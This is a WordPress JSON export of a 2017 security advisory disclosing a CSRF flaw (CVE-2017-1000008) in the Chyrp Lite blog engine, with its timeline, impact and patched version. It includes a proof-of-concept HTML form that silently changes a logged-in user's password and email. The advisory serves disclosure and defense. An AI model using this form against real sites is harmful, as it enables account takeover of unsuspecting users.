{"id":89,"date":"2017-03-06T21:01:24","date_gmt":"2017-03-06T21:01:24","guid":{"rendered":"https:\/\/cp270.wordpress.com\/?p=89"},"modified":"2021-01-03T16:45:07","modified_gmt":"2021-01-03T16:45:07","slug":"security-advisory-cross-site-request-forgery-in-chyrp-lite","status":"publish","type":"post","link":"https:\/\/cpearson.icu\/?p=89","title":{"rendered":"Security Advisory \u2013 Cross Site Request Forgery in Chyrp Lite"},"content":{"rendered":"<p><strong>Product:<\/strong> Chyrp Lite<br \/>\n<strong>Vendor:<\/strong> Open source community<br \/>\n<strong>Version:<\/strong> 2016.04 &#8220;Lago&#8221; and earlier<br \/>\n<strong>Category:<\/strong> Cross site request forgery (CSRF)<br \/>\n<strong>Vendor Notified:<\/strong> 2017-01-05<br \/>\n<strong>Patched:<\/strong> 2017-01-06<br \/>\n<strong>Disclosed:<\/strong> 2017-03-06<br \/>\n<strong>Researcher(s):<\/strong> Carl Pearson<br \/>\n<strong>CVE:<\/strong> CVE-2017-1000008<\/p>\n<p><strong>Summary<\/strong><br \/>\nA cross-site request forgery (CSRF) vulnerability exists in the user properties function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/>\nExample HTML attack form:<br \/>\n[code language=&#8221;html&#8221;]<br \/>\n&lt;!&#8211; The form submits when this button is clicked. &#8211;&gt;<br \/>\n&lt;button onclick=&quot;document.csrf_form.submit()&quot;&gt;Click to run&lt;\/button&gt;<br \/>\n&lt;!&#8211; Edit the &#8216;action&#8217; attribute to reflect the IP address or hostname of the victim&#8217;s Chyrp install. &#8211;&gt;<br \/>\n&lt;form name=&quot;csrf_form&quot; id=&quot;csrf_form&quot; method=&quot;POST&quot; action=&quot;http:\/\/[host]\/?action=controls&quot;&gt;<br \/>\n\t&lt;input class=&quot;text&quot; type=&quot;text&quot; name=&quot;login&quot; value=&quot;user&quot; id=&quot;login&quot; disabled=&quot;disabled&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;full_name&quot; value=&quot;&quot; id=&quot;full_name&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;email&quot; value=&quot;user@example.com&quot; id=&quot;email&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;website&quot; value=&quot;http:\/\/yahoo.com&quot; id=&quot;website&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;password&quot; name=&quot;new_password1&quot; value=&quot;apple&quot; id=&quot;new_password1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;password&quot; name=&quot;new_password2&quot; value=&quot;apple&quot; id=&quot;new_password2&quot;\/&gt;<br \/>\n&lt;\/form&gt;<br \/>\n[\/code]<\/p>\n<p><strong>Impact<\/strong><br \/>\nIf successful, an attacker can arbitrarily change the user&#8217;s password, email, and username to any desired values.<\/p>\n<p><strong>Solution<\/strong><br \/>\nChyrp Lite version 2017.01 &#8220;Swainson&#8221; patches this issue. Updating any existing Chyrp Lite installs is recommended.<\/p>\n<p><strong>Reference<\/strong><br \/>\nProject home: https:\/\/github.com\/xenocrat\/chyrp-lite<br \/>\nv2017.01 release notes: https:\/\/github.com\/xenocrat\/chyrp-lite\/releases\/tag\/v2017.01<br \/>\nChangelog: https:\/\/github.com\/xenocrat\/chyrp-lite\/commit\/79bb2de7f57d163d256b6bdb127dc09cfdb6235a<br \/>\nOWASP CSRF overview: https:\/\/www.owasp.org\/index.php\/Cross-Site_Request_Forgery_(CSRF)<\/p>\n<p>Edit 7\/13\/17: CVE identifier added.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Product: Chyrp Lite Vendor: Open source community Version: 2016.04 &#8220;Lago&#8221; and earlier Category: Cross site request forgery (CSRF) Vendor Notified: 2017-01-05 Patched: 2017-01-06 Disclosed: 2017-03-06 Researcher(s): Carl Pearson CVE: CVE-2017-1000008 Summary A cross-site request forgery (CSRF) vulnerability exists in the user properties function of the Chyrp Lite blog engine. An [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-89","post","type-post","status-publish","format-standard","hentry","category-advisory"],"_links":{"self":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=89"}],"version-history":[{"count":1,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89\/revisions"}],"predecessor-version":[{"id":169,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89\/revisions\/169"}],"wp:attachment":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}